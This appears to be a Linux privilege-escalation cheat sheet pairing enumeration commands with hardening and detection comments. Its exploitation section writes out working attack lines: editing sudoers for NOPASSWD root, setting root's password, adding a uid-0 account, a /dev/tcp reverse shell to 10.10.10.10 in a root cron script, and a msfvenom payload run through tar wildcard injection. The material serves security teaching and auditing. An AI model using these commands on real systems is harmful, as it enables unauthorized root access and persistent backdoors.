Linux Privilege Escalation
Enumeration is one of the most important things to do when trying to escalate privileges. I'll cover that first, then move on to exploiting some of the most frequently found misconfigurations and vulnerabilities.
Last updated: May 4th, 2023
Local Enumeration
System
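# --- Local enumeration: system ---
# Read-only inventory of the host. Each line is annotated with the hardening
# question it answers; nothing in this section changes state.
uname -a                      # kernel release and arch; compare against the distro's current security advisories
ls /etc/*-release             # distro and version (ls prints the glob literally when nothing matches)
cat /proc/version
cat /etc/issue
cat /proc/cpuinfo
cat /proc/meminfo
lshw                          # hardware inventory; full output usually needs root
lscpu
lsmod                         # loaded kernel modules; compare with what the host is expected to run
df -h                         # filesystems and free space; pair with mount(8) to check nosuid/noexec on /tmp and home
lspci
lsusb
ps aux                        # if anything looks out of the ordinary, a process monitor such as pspy shows short-lived jobs
ls -al /etc/init.d/
# Init scripts not owned by root: whoever owns them can edit what runs at boot as root.
# -exec ... + replaces the unquoted xargs pipe, which broke on filenames with spaces.
find /etc/init.d/ ! -uid 0 -type f -exec ls -la {} + 2>/dev/null
env                           # secrets and odd LD_*/PATH entries show up here; do not paste this output into reports verbatim
printf '%s\n' "$PATH"         # a writable or relative ("." or empty) entry in PATH is a misconfiguration
# Installed packages: run the one matching the package manager; the others simply fail.
rpm -qa 2>/dev/null
dpkg -l 2>/dev/null
pacman -Qe 2>/dev/null        # pacman's query operation is uppercase -Q; lowercase -q is --quiet and needs an operation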
User
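# --- Local enumeration: user ---
whoami
id                            # uid, gid and supplementary groups
# Membership of a privileged group (for example sudo, disk or docker) is root-equivalent and
# should be audited like a sudo rule. Set group to the group under review and list what it owns;
# the original left an unquoted *group* glob here, which the shell expanded against the cwd.
group=${group:-'<GROUP_TO_AUDIT>'}   # placeholder
find / -group "$group" 2>/dev/null
sudo -l                       # sudo rules for this account
cat /etc/passwd
cat /etc/shadow               # must not be readable by unprivileged users; if this succeeds, the mode is wrong (expected 0640 root:shadow)
cat /etc/group
cat /etc/sudoers              # likewise: a normal user reading sudoers is a misconfiguration (expected 0440)
# Per-user secrets. Anything here readable by other users is a finding (expected: .ssh 700, private keys 600).
ls -als /home/*/.ssh
ls -als /home/*/.gnupg/
ls -als /home/*/.config/
last -a                       # recent logins
w
history                       # shell history frequently contains pasted credentials
getcap -r / 2>/dev/null       # file capabilities (repeated under File and Task below)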
Network
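# --- Local enumeration: network ---
ifconfig -a                   # network interfaces (legacy net-tools; ip(8) below is the current equivalent)
hostname -f
cat /etc/hosts
ip a
ip route
route -n
ip addr show
ss -twurp                     # active connections with the owning processes
netstat -auntp
arp -a                        # ARP cache: neighbours this host has recently talked to
ip neigh
netstat -ano                  # -l listening, -t and -u, -p pid
# Services bound only to 127.0.0.1 are still reachable from this host and deserve the same
# authentication review as externally exposed ones.
# Outbound firewall rules: portquiz.net answers on every TCP port, so a port that fails to connect is blocked egress.
# The original referenced an unset $ports; the default below is a constructed example, adjust it to the ports under review.
ports=${ports:-'1-1024'}
nmap -sT -p"$ports" portquiz.net
cat /etc/resolv.conf          # DNS servers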
Software
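# --- Local enumeration: software ---
command -v python             # which(1) is not guaranteed to exist; command -v is the portable check
locate python                 # relies on an up-to-date locate database
dpkg -l | grep nginx          # Debian family only; use rpm -qa | grep nginx on RPM-based systems
python -V                     # lowercase -v is verbose import tracing and drops into the REPL; -V prints the version
python --version
# Mounted docker socket: anything that can write to it can start a privileged container, which is
# equivalent to root on the host. Containers should not have it bind-mounted, and its group should be tightly controlled.
find / -name docker.sock 2>/dev/null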
File and Task
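# --- Local enumeration: files and scheduled tasks ---
# SUID/SGID binaries: each runs with its owner's (usually root's) privileges.
# The list should match what the distro ships; anything custom needs a justification or chmod u-s.
find / -perm -4000 -type f -exec ls -la {} + 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} + 2>/dev/null
# File capabilities. "=ep" grants the listed capability unconditionally; cap_setuid=ep, for example, is root-equivalent.
getcap -r / 2>/dev/null
# Files modified in the last 10 minutes (handy for seeing what a scheduled job just touched).
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
lsof
# Shell and tool history files. The pattern is quoted so the shell does not expand it before find sees it.
find / -name '*.*history*' -print 2>/dev/null
# Writable files. Any of these owned by root, or executed by a privileged task, is a misconfiguration;
# fix with chmod o-w (and g-w where the group is not trusted).
find / -writable ! -user "$(whoami)" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} + 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
group=${group:-'<GROUP_TO_AUDIT>'}   # placeholder; the original used an unset, unquoted $group
find / -writable ! -group "$group" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} + 2>/dev/null
# systemd timers
systemctl list-timers --all
# Scheduled tasks. A cron entry that runs a script writable by a non-root user is the classic
# "root on a schedule" misconfiguration: the script and every directory on its path must be root-owned and 755 or tighter.
crontab -l
ls -al /etc/cron*
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;   # -exec needs its "\;" terminator, which the original dropped
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
ps                            # -e all, -f format, -j jobs, -l long, -u user-oriented
# Inspecting what an interesting binary does at runtime. $file is a placeholder for the path under review.
# Both tracers print their trace on stderr, so redirecting 2>/dev/null (as the original did) discards the output you want.
file=${file:-'<PATH_TO_INSPECT>'}
ltrace "$file"
strace "$file"
# NFS: an export marked no_root_squash lets a remote root create root-owned files on this server.
cat /etc/exports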
Password
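# --- Local enumeration: credentials left on disk ---
# Secrets in files are a finding for the host's owner as much as for the tester: they belong in a
# secrets store, or at least outside world-readable locations, and should be rotated once found.
# The original line began with a stray "cat" and passed --color twice.
grep --color=auto -rnw '/' -ie "PASSWORD=" 2>/dev/null   # whole-filesystem search is slow; narrow the path where possible
locate password | more
# SSH material: authorized_keys outside ~/.ssh, and private keys readable by others, are both misconfigurations.
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;   # the extra /dev/null forces the filename prefix (grep -H does the same)
strings -n10 /dev/mem | grep -i PASS   # needs root; most current kernels also restrict /dev/mem (STRICT_DEVMEM), so expect this to fail
grep -i 'passw*' * 2>/dev/null   # files in the current directory; the pattern is quoted so the shell cannot glob it
grep -E '^user|^pass' /var/log/apache/access.log   # plain ASCII quotes; the curly quotes in the original were passed to grep as literal characters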
Information
# Local mail spools; a readable spool belonging to another user is a permissions finding (expected mode 0660 user:mail).
ls -lh -- /var/mail
Basic Exploitation
Sudo
#sudo privileges
# Hardening view: every rule listed here is effectively root when the granted command is an editor,
# pager, interpreter or anything else that can spawn a shell. Keep the list minimal and avoid NOPASSWD.
sudo -l #gtfobins for quickwins
#LD_PRELOAD
##Loads a library before other libraries, find code online for mal library
##compile with gcc -fPIC shared shell.so shell.c -nostartfiles
# This only works when sudoers preserves LD_PRELOAD (an env_keep entry); the default env_reset strips LD_* variables.
# Detection/mitigation: audit /etc/sudoers and sudoers.d for "env_keep" additions and remove LD_PRELOAD/LD_LIBRARY_PATH from them.
sudo LD_PRELOAD=$PATH/shell.so vim
SUID
#suid bit
# Hardening view: remove the SUID bit (chmod u-s) from anything not on the distro's own list,
# and prefer a narrowly scoped file capability over SUID root where the program needs just one privilege.
find / -perm -u=s -type f 2>/dev/null
#use gtfobins for wins
#Shared Object
# A SUID binary that searches a directory other users can write to for its libraries is the
# misconfiguration here; fix it with a root-owned library path (RPATH/ldconfig) or drop the SUID bit.
strace suspicious_suid_binary | grep -iE "no such file or directory"
#env vars
# NOTE(review): the original page stops at this heading; nothing below it expands on environment variables.
RootSquash
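# NFS root squash. With the default root_squash a remote uid 0 is mapped to nobody; an export marked
# no_root_squash lets a remote root create root-owned (including SUID) files on the server.
# Exports should keep root_squash and be restricted to named hosts rather than "*".
grep root /etc/exports        # grep reads the file directly; the cat pipe was redundant
target_host=${target_host:-'<NFS_SERVER_IP>'}   # placeholder for the NFS server under review
showmount -e "$target_host"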
Capabilities
Writable Root Script
# Each write below changes an authentication database. That is why /etc/sudoers, /etc/passwd and
# /etc/shadow belong under file-integrity monitoring (AIDE, or auditctl -w rules with -p wa) and why a
# script executed by root must never be writable by anyone else: the root-run script is the real bug here.
#add user to sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
#change root password
echo "root:hacked" | chpasswd
#add user to /etc/passwd
# Detection: a second uid-0 entry in /etc/passwd is a reliable indicator (`awk -F: '$3 == 0' /etc/passwd` should print only root).
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
Cron Jobs
# File permissions on scheduled scripts. A root cron entry pointing at a script the current user can
# write to is the misconfiguration; the fix is chown root and chmod 755 on the script and its directory.
cat -- /etc/crontab
ls -l -- /usr/local/bin/overwrite.sh
Change its contents to:
#!/bin/bash
# Reverse shell payload written into a root-run cron script.
# Detection: a bash process spawned by cron that opens an outbound TCP connection (a /dev/tcp
# path in its command line, or a connect() from a cron child in audit/eBPF telemetry).
# Prevention: the script was writable by a non-root user; root ownership and mode 755 remove the issue.
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
#Wildcards
# tar wildcard injection: when a root job runs "tar ... *" inside a directory other users can write to,
# the shell expands filenames beginning with "--" into the command line and tar parses them as options.
# Fix the job rather than the directory: avoid the glob ("tar -cf out.tar -C dir ." or "./*" with --),
# and never run wildcard expansions as root in user-writable directories.
# Detection: files whose names start with "--" (especially --checkpoint*) in backup or upload directories.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf
chmod +x /home/user/shell.elf
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf